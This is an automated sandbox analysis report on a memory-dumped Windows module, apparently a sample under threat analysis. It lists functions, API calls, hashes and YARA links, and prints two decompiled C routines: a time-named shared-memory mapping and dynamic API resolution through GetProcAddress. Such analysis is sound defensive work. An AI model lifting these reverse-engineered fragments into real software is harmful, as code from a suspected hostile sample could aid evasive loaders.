Associated: 00000003.00000002.901760956.000000006D455000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.901769198.000000006D456000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 496836c75ec0c7e6e4674cb2d8ccbce0c48f5d1f09b3b34a77d35bd11dd49069
Instruction ID: 7023fddc97f040924c98ac6c7e68329de993e25b916869f9b7c63427f0cebbe1
Opcode Fuzzy Hash: 496836c75ec0c7e6e4674cb2d8ccbce0c48f5d1f09b3b34a77d35bd11dd49069
Instruction Fuzzy Hash: D4E092312053116BE6027A298C88F6B776CDF96770B120335F521D22D4CB64CC228AA5

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BF58C, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6D4BF5CD

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b3b739c4c03cc171a6a2512c26b0fd25f2567916fff8ce69eca33b8b3c58218e
Instruction ID: d7c3b021a5854b0cad3682e518e2aa0937773d0542cd68e65697bf0651ad2ccd
Opcode Fuzzy Hash: b3b739c4c03cc171a6a2512c26b0fd25f2567916fff8ce69eca33b8b3c58218e
Instruction Fuzzy Hash: 02F0243D65F126A7EB015E2A8C04F1A3798AF717B0B228016EC1CD6281DF31EC0186F0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4773C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 6D4773E8

Part of subcall function 6D478A3D: std::_Lockit::_Lockit.LIBCPMT ref: 6D478A4F
Part of subcall function 6D478A3D: std::locale::_Setgloballocale.LIBCPMT ref: 6D478A6A
Part of subcall function 6D478A3D: _Yarn.LIBCPMT ref: 6D478A80
Part of subcall function 6D478A3D: std::_Lockit::~_Lockit.LIBCPMT ref: 6D478AC0

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 238635018-0
Opcode ID: 3fb33257ae8c81fb0af646fa2067f6f1b85dd33568fd6f6f967d4cb5e3726680
Instruction ID: 0ea63edf627e76353725df574c67782d1d9c5ad45ce826082993449d712a0eb9
Opcode Fuzzy Hash: 3fb33257ae8c81fb0af646fa2067f6f1b85dd33568fd6f6f967d4cb5e3726680
Instruction Fuzzy Hash: A7E0DF32E0D622CBD3309B6A8001FACAB81AB40B94FA2001ED7009F680CBB44C4087D2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6D4CDE61, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 6D4BDE57: GetLastError.KERNEL32(?,?,6D4B42CA,?,?,6D47A5FA,?,6D460074,6D534074,?,?,?,6D4FC880,000000FF), ref: 6D4BDE5B
Part of subcall function 6D4BDE57: _free.LIBCMT ref: 6D4BDE8E
Part of subcall function 6D4BDE57: SetLastError.KERNEL32(00000000), ref: 6D4BDECF
Part of subcall function 6D4BDE57: _abort.LIBCMT ref: 6D4BDED5

Part of subcall function 6D4BDE57: _free.LIBCMT ref: 6D4BDEB6
Part of subcall function 6D4BDE57: SetLastError.KERNEL32(00000000), ref: 6D4BDEC3

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6D4CDF6D
IsValidCodePage.KERNEL32(00000000), ref: 6D4CDFC8
IsValidLocale.KERNEL32(?,00000001), ref: 6D4CDFD7
GetLocaleInfoW.KERNEL32(?,00001001,.Km,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 6D4CE01F
GetLocaleInfoW.KERNEL32(?,00001002,00000004,00000040), ref: 6D4CE03E

Strings

.Km, xrefs: 6D4CDF43, 6D4CDF38, 6D4CDF96
.Km, xrefs: 6D4CDE8A, 6D4CDE9A, 6D4CDF5A, 6D4CDEFC, 6D4CDEF1, 6D4CDEF4, 6D4CDEFF, 6D4CDF5D
.Km, xrefs: 6D4CDE77, 6D4CE016

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: .Km$.Km$.Km
API String ID: 745075371-3451765847
Opcode ID: 2352fd2f989ddcc43bf81c8af83a708986b6c52847f1c8a932762f57824107e6
Instruction ID: bbdfc5cfcde2771bc8d938c49f6fc1a364fff38656180e8b4437088aabd462c6
Opcode Fuzzy Hash: 2352fd2f989ddcc43bf81c8af83a708986b6c52847f1c8a932762f57824107e6
Instruction Fuzzy Hash: BB51717AA446069BEF10DFA5CC44FBE77B8BF95700F11456AE914E7240E7709D01CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CD50B, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 6D4BDE57: GetLastError.KERNEL32(?,?,6D4B42CA,?,?,6D47A5FA,?,6D460074,6D534074,?,?,?,6D4FC880,000000FF), ref: 6D4BDE5B
Part of subcall function 6D4BDE57: _free.LIBCMT ref: 6D4BDE8E
Part of subcall function 6D4BDE57: SetLastError.KERNEL32(00000000), ref: 6D4BDECF
Part of subcall function 6D4BDE57: _abort.LIBCMT ref: 6D4BDED5

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6D4BE835,?,?,?,?,6D4BE211,?,00000004), ref: 6D4CD5ED
_wcschr.LIBVCRUNTIME ref: 6D4CD67D
_wcschr.LIBVCRUNTIME ref: 6D4CD68B
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,5Km,00000000,?), ref: 6D4CD72E

Strings

5Km, xrefs: 6D4CD604, 6D4CD64C, 6D4CD6F4

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: 5Km
API String ID: 4212172061-3890798359
Opcode ID: f4b1c12ea5de5b9c797a6f6f07d86e80b464ff9e3bce2fc9627f74cce88d0382
Instruction ID: c7b4aa6cc9255ef32e1e0c6e84fd27d3a38a885c2bb9104d8a2fbe77972dba8b
Opcode Fuzzy Hash: f4b1c12ea5de5b9c797a6f6f07d86e80b464ff9e3bce2fc9627f74cce88d0382
Instruction Fuzzy Hash: F5613B79644206AAEB14EF35CC40FBA73ACEF85754F21442DEA19D7280EB70ED41C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CDC8D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,6D4CDFAC,?,00000000), ref: 6D4CDD26
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,6D4CDFAC,?,00000000), ref: 6D4CDD4F
GetACP.KERNEL32(?,?,6D4CDFAC,?,00000000), ref: 6D4CDD64

Strings

OCP, xrefs: 6D4CDCE1
ACP, xrefs: 6D4CDCAB

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 7966e76a23ff36527de6f8bdb65bd4ed158541b150fc0c2765a6ece1c690cbab
Instruction ID: afcc78d726148c01da03b54a7522da485126a0f8b0fb36e3f9a78dbf1537bf20
Opcode Fuzzy Hash: 7966e76a23ff36527de6f8bdb65bd4ed158541b150fc0c2765a6ece1c690cbab
Instruction Fuzzy Hash: 3321B22AAC4142AAD7258F18C940F9773B6FFC5B20B628465E909D7304F732DD42C792

Uniqueness

Uniqueness Score: -1.00%

Function 6D4B3EDA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6D4B3FD2
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6D4B3FDC
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6D4B3FE9

Strings

^Km, xrefs: 6D4B3EDC

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: ^Km
API String ID: 3906539128-1844677095
Opcode ID: d6c45b5ff5bd0ece1d13ee73b9a04f01701c726f8eeee6153470ca9b604dbfd0
Instruction ID: cd2e0200362100516e66bf70fd4938679b4b61cbe588f2580bda20d9f7015413
Opcode Fuzzy Hash: d6c45b5ff5bd0ece1d13ee73b9a04f01701c726f8eeee6153470ca9b604dbfd0
Instruction Fuzzy Hash: 3331D47590121DABCB21DF29D888B9DBBB8BF08354F5141DAE41DAB250EB709F818F94

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CBC30, Relevance: 19.6, APIs: 13, Instructions: 114COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6D4CBC74

Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBF61
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBF73
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBF85
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBF97
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFA9
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFBB
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFCD
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFDF
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFF1
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CC003
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CC015
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CC027
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CC039

_free.LIBCMT ref: 6D4CBC69

Part of subcall function 6D4C02CE: HeapFree.KERNEL32(00000000,00000000,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?), ref: 6D4C02E4
Part of subcall function 6D4C02CE: GetLastError.KERNEL32(?,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?,?), ref: 6D4C02F6

_free.LIBCMT ref: 6D4CBC8B
_free.LIBCMT ref: 6D4CBCA0
_free.LIBCMT ref: 6D4CBCAB
_free.LIBCMT ref: 6D4CBCCD
_free.LIBCMT ref: 6D4CBCE0
_free.LIBCMT ref: 6D4CBCEE
_free.LIBCMT ref: 6D4CBCF9
_free.LIBCMT ref: 6D4CBD31
_free.LIBCMT ref: 6D4CBD38
_free.LIBCMT ref: 6D4CBD55
_free.LIBCMT ref: 6D4CBD6D

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: e30783bc724e0ab22ef163a5af8ac72329d5a4bc0ad61ec0d560dc0186cae01b
Instruction ID: 723a9988ff43810c956a1fc028de71134e3d95526f5fa90ba1f9796108423535
Opcode Fuzzy Hash: e30783bc724e0ab22ef163a5af8ac72329d5a4bc0ad61ec0d560dc0186cae01b
Instruction Fuzzy Hash: 6E314B796083069FEB209B75D944F6A77E9EF00325F31482DE959DB250EF35AC80CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C5B5F, Relevance: 13.8, APIs: 9, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5e1288afa835fd4c7d3b3875288687cdc784e4a45fdbcaed62dc58e751d143b
Instruction ID: fab856745e61aafe028194d5cca3168a18b08f21658e83dac7dbe6dc952cc962
Opcode Fuzzy Hash: f5e1288afa835fd4c7d3b3875288687cdc784e4a45fdbcaed62dc58e751d143b
Instruction Fuzzy Hash: 35C17F78D0838A9BDF01DFA9C844FBD7BB4AF1A314F254149E914A7381C7349D41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D45102F, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6D45102F(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6D452100();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6d454150;
				_push(_t15 + 0x6d45505e);
				_push(_t15 + 0x6d455054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6D4520FA();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t34 = CreateFileMappingW(0xffffffff, 0x6d454140, 4, 0, _t18,  &_v60);
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 6D45103C
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6D451052
_snwprintf.NTDLL ref: 6D451077
CreateFileMappingW.KERNEL32(000000FF,6D454140,00000004,00000000,?,?), ref: 6D45109C
GetLastError.KERNEL32 ref: 6D4510B3
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 6D4510C7
GetLastError.KERNEL32 ref: 6D4510DF
CloseHandle.KERNEL32(00000000), ref: 6D4510E8
GetLastError.KERNEL32 ref: 6D4510F0

Memory Dump Source

Source File: 00000003.00000002.901746074.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000003.00000002.901741114.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.901751571.000000006D453000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.901760956.000000006D455000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.901769198.000000006D456000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 52c4775ef3b38930e07559d0ea66936b3d22608f78a2d3f08662d636e95bfda0
Instruction ID: ac15928bc50e7527367a61828a1be81c28a2ebf7743cbf6344d735e8b34e6d8a
Opcode Fuzzy Hash: 52c4775ef3b38930e07559d0ea66936b3d22608f78a2d3f08662d636e95bfda0
Instruction Fuzzy Hash: 78217F72500248BFDB11AFA8CC88FEE7BB9EB49B54F218225F615D7240D730DD658BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BF177, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 274COMMON

Download Yara Rule

APIs

Part of subcall function 6D4BDE57: GetLastError.KERNEL32(?,?,6D4B42CA,?,?,6D47A5FA,?,6D460074,6D534074,?,?,?,6D4FC880,000000FF), ref: 6D4BDE5B
Part of subcall function 6D4BDE57: _free.LIBCMT ref: 6D4BDE8E
Part of subcall function 6D4BDE57: SetLastError.KERNEL32(00000000), ref: 6D4BDECF
Part of subcall function 6D4BDE57: _abort.LIBCMT ref: 6D4BDED5

_memcmp.LIBVCRUNTIME ref: 6D4BF421
_free.LIBCMT ref: 6D4BF492
_free.LIBCMT ref: 6D4BF4AB
_free.LIBCMT ref: 6D4BF4DD
_free.LIBCMT ref: 6D4BF4E6
_free.LIBCMT ref: 6D4BF4F2

Strings

C, xrefs: 6D4BF2DF

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: a5f72012d3fde91f84c55e98aa093ecd46f9610939b675f89215fcb16d1dae68
Instruction ID: e5cc26451342284ca9e30399d7b24bc33520185a7663a7318929f6840039b9d8
Opcode Fuzzy Hash: a5f72012d3fde91f84c55e98aa093ecd46f9610939b675f89215fcb16d1dae68
Instruction Fuzzy Hash: BBC12B7990621A9FDB24CF18C884FADB7B4FB59304F6185AAD90DA7350D731AE90CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C8870, Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4C88F2
_free.LIBCMT ref: 6D4C8916
_free.LIBCMT ref: 6D4C8A9D
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6D508120), ref: 6D4C8AAF
WideCharToMultiByte.KERNEL32(00000000,00000000,6D540A64,000000FF,00000000,0000003F,00000000,?,?), ref: 6D4C8B27
WideCharToMultiByte.KERNEL32(00000000,00000000,6D540AB8,000000FF,?,0000003F,00000000,?), ref: 6D4C8B54
_free.LIBCMT ref: 6D4C8C69

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: f3a717610ddb93d3c3bbac6b876ce254568b29177abf97c867122c4c5d29ef98
Instruction ID: 919b703ca97fa5f29b14318156a3eb085a2b0109bd7dabcb1f97c2eb38637080
Opcode Fuzzy Hash: f3a717610ddb93d3c3bbac6b876ce254568b29177abf97c867122c4c5d29ef98
Instruction Fuzzy Hash: E6C128799082069FDB15DF79C840FAE7BB8AF42314F2541AEE59497341E7318E41CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BECF9, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 6D4C1817: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 6D4C1849

_free.LIBCMT ref: 6D4BEE04
_free.LIBCMT ref: 6D4BEE1B
_free.LIBCMT ref: 6D4BEE3A
_free.LIBCMT ref: 6D4BEE55
_free.LIBCMT ref: 6D4BEE6C

Strings

DnPm, xrefs: 6D4BEDDE

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free$AllocateHeap
String ID: DnPm
API String ID: 3033488037-4274239213
Opcode ID: a10aa1d19e859c581cb0e343fb6fa6c850f48d114b6c3c819f7d8e5cdf5a56e0
Instruction ID: 840883cf38a15c5203f375ba5df4977e8554e6b8ab4b1da75fd05d0cba5d0c8f
Opcode Fuzzy Hash: a10aa1d19e859c581cb0e343fb6fa6c850f48d114b6c3c819f7d8e5cdf5a56e0
Instruction Fuzzy Hash: 1551B175A04305AFEB11CF69C880F6A77F4EF99724F2145ADEA09DB250E731DE418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C240C, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,6D4C2B81,?,?,?,?,?,?), ref: 6D4C244E
__fassign.LIBCMT ref: 6D4C24C9
__fassign.LIBCMT ref: 6D4C24E4
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6D4C250A
WriteFile.KERNEL32(?,?,00000000,6D4C2B81,00000000,?,?,?,?,?,?,?,?,?,6D4C2B81,?), ref: 6D4C2529
WriteFile.KERNEL32(?,?,00000001,6D4C2B81,00000000,?,?,?,?,?,?,?,?,?,6D4C2B81,?), ref: 6D4C2562

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: c214aa73fece6ee32c3bf360dc021a9e6054e817e94aff7fcb7fafe77c047ad7
Instruction ID: 97f2cdaded1060c31db009cf59c5982260663a49d18d2682c6d76897284216c5
Opcode Fuzzy Hash: c214aa73fece6ee32c3bf360dc021a9e6054e817e94aff7fcb7fafe77c047ad7
Instruction Fuzzy Hash: EF519075A00249AFDF10CFA8C895FEEBBF8EF49300F15412AE955E7241DB709941CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CCA10, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6D4CC6F6: _free.LIBCMT ref: 6D4CC71F

_free.LIBCMT ref: 6D4CCA5E

Part of subcall function 6D4C02CE: HeapFree.KERNEL32(00000000,00000000,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?), ref: 6D4C02E4
Part of subcall function 6D4C02CE: GetLastError.KERNEL32(?,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?,?), ref: 6D4C02F6

_free.LIBCMT ref: 6D4CCA69
_free.LIBCMT ref: 6D4CCA74
_free.LIBCMT ref: 6D4CCAC8
_free.LIBCMT ref: 6D4CCAD3
_free.LIBCMT ref: 6D4CCADE
_free.LIBCMT ref: 6D4CCAE9

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9d7fa3d03ade73cbe32b9155f84779464575b1a55af6e10987faf18e024615a8
Instruction ID: 05dd7c52da67924be9ad83aaee827d802a456890a2019beb5be96e66a56c2e14
Opcode Fuzzy Hash: 9d7fa3d03ade73cbe32b9155f84779464575b1a55af6e10987faf18e024615a8
Instruction Fuzzy Hash: 4511AC79A49B08AAEA20EBB0CD05FCB779EAF00304F45081CB7A9B6050CB64FC4086C2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BFDE2, Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,00000000,00000000,6D47312A,?,?,?,6D4C0033,00000001,00000001,9F418D08), ref: 6D4BFE3C
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6D4C0033,00000001,00000001,9F418D08,00000000,?,?), ref: 6D4BFEC2
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,00000000,9F418D08,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6D4BFFBC
__freea.LIBCMT ref: 6D4BFFC9

Part of subcall function 6D4C1817: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 6D4C1849

__freea.LIBCMT ref: 6D4BFFD2
__freea.LIBCMT ref: 6D4BFFF7

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 54114cdd00808bfa1e4ad4d19ebf83486203911e90a795f74954c7ed4388e79c
Instruction ID: 75019a6c6965533f8467b34cda28c3bd6eeacaef6440296edf7e4a85fdb1b704
Opcode Fuzzy Hash: 54114cdd00808bfa1e4ad4d19ebf83486203911e90a795f74954c7ed4388e79c
Instruction Fuzzy Hash: C9510336A11217ABEB158E64CC40EBB7BA9EB56754F21462EFD0CD7280EB35DC40C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4B526F, Relevance: 9.2, APIs: 6, Instructions: 200COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 6D4B529B
__cftoe.LIBCMT ref: 6D4B52CD

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: c8924ee84c743fd3fa5024435cee531011904a63d8dee87bc3e64307ee3ef695
Instruction ID: 77aa08f2837dde20e0125cb36e60d72b669232d6ba81a54a10bc59d693d25092
Opcode Fuzzy Hash: c8924ee84c743fd3fa5024435cee531011904a63d8dee87bc3e64307ee3ef695
Instruction Fuzzy Hash: F951F436908206ABDB148B69DC40FBEB7B8AF59364F61421DE924A6391DB71CD00CAB4

Uniqueness

Uniqueness Score: -1.00%

Function 6D451A0F, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D451A0F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6D451DE1(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6d454150 + 0x6d455014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6d454150 + 0x6d455151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6D451DFC(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6d454150 + 0x6d455161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6d454150 + 0x6d455174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6d454150 + 0x6d455189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6d454150 + 0x6d45519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6D451EB5(_t56, _a12);
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

APIs

Part of subcall function 6D451DE1: HeapAlloc.KERNEL32(00000000,?,6D451556,00000208,00000000,00000000,?,?,?,6D4516A9,?), ref: 6D451DED

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6D451E4D,?,?,?,?,?,00000002,?,6D451401), ref: 6D451A33
GetProcAddress.KERNEL32(00000000,?), ref: 6D451A55
GetProcAddress.KERNEL32(00000000,?), ref: 6D451A6B
GetProcAddress.KERNEL32(00000000,?), ref: 6D451A81
GetProcAddress.KERNEL32(00000000,?), ref: 6D451A97
GetProcAddress.KERNEL32(00000000,?), ref: 6D451AAD

Part of subcall function 6D451EB5: memset.NTDLL ref: 6D451F34

Memory Dump Source

Source File: 00000003.00000002.901746074.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000003.00000002.901741114.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.901751571.000000006D453000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.901760956.000000006D455000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.901769198.000000006D456000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocHandleHeapModulememset
String ID:
API String ID: 426539879-0
Opcode ID: 4a57d79961c0205b90ff4bcc98c66f82fc5445e9ef0ebfabb9fe0ab942373770
Instruction ID: 27c62b1c31635cc2c2168556110bbe497fcf9e7c6e12cce6ef880a9de927b32a
Opcode Fuzzy Hash: 4a57d79961c0205b90ff4bcc98c66f82fc5445e9ef0ebfabb9fe0ab942373770
Instruction Fuzzy Hash: B2213EB160060EAFDB51EFA9C884EA67BF8FF096407018515E515CB314E771ED22CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BDE57, Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,6D4B42CA,?,?,6D47A5FA,?,6D460074,6D534074,?,?,?,6D4FC880,000000FF), ref: 6D4BDE5B
_free.LIBCMT ref: 6D4BDE8E
_free.LIBCMT ref: 6D4BDEB6
SetLastError.KERNEL32(00000000), ref: 6D4BDEC3
SetLastError.KERNEL32(00000000), ref: 6D4BDECF
_abort.LIBCMT ref: 6D4BDED5

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
